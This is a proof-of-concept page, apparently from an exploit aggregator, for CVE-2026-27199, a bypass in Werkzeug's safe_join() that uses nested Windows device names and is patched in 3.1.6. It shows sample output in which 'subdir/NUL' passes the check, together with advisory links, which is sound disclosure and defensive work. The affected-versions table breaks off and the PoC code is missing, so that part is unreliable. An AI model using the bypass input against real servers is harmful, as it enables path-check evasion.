Share
## https://sploitus.com/exploit?id=B9F1507A-4F0C-570E-BE65-2A55AFFFF33C
# CVE-2026-27199 PoC: Werkzeug `safe_join()` Windows Device-Name Bypass

> **Status:** Publicly disclosed. Fixed in **werkzeug 3.1.6**.  
> **Severity:** Moderate  
> **Reporter:** [@alimezar](https://github.com/alimezar)  
> **Advisory:** [GHSA-29vq-49wr-vm6x](https://github.com/advisories/GHSA-29vq-49wr-vm6x)

---

## Affected Versions

| Package   | Affected  | Patched |
|-----------|-----------|---------|
| werkzeug  | ` **Requires:** Windows, Python 3.8+, `werkzeug  None  (correctly blocked)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL  (bypass!)

[*] Attempting to write to the returned path ...
[!] open(nested NUL) write: SUCCESS โ€” data silently discarded by device

[!] VULNERABLE: CVE-2026-27199 confirmed on this installation.
    Upgrade to werkzeug >= 3.1.6 to remediate.
```

### Expected output (patched version)

```
[+] safe_join(base, 'subdir/NUL') -> None  (correctly blocked)
[+] NOT VULNERABLE: nested device name was blocked.
```

---
## References

- [GHSA-29vq-49wr-vm6x](https://github.com/advisories/GHSA-29vq-49wr-vm6x) โ€” this advisory
- [GHSA-hgf8-39gv-g3f2](https://github.com/advisories/GHSA-hgf8-39gv-g3f2) โ€” prior related advisory
- [GHSA-87hc-h4r5-73f7](https://github.com/advisories/GHSA-87hc-h4r5-73f7) โ€” prior related advisory
- [Werkzeug changelog](https://werkzeug.palletsprojects.com/en/stable/changes/)

---

*This PoC is published for educational and defensive purposes following responsible disclosure and public patch availability.*